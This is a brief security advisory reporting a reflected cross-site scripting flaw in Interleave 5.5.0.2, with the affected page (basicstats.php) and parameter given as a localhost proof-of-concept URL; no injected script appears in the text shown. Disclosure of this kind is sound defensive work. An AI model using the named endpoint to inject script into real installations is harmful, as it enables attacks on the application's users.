------------------------------------------------------------------------ Software................Interleave 5.5.0.2 Vulnerability...........Reflected Cross-site Scripting Threat Level............Low (1/5) Download................http://www.interleave.nl/en/ Release Date............3/3/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch ........................Bryce Darling ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in Interleave 5.5.0.2 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0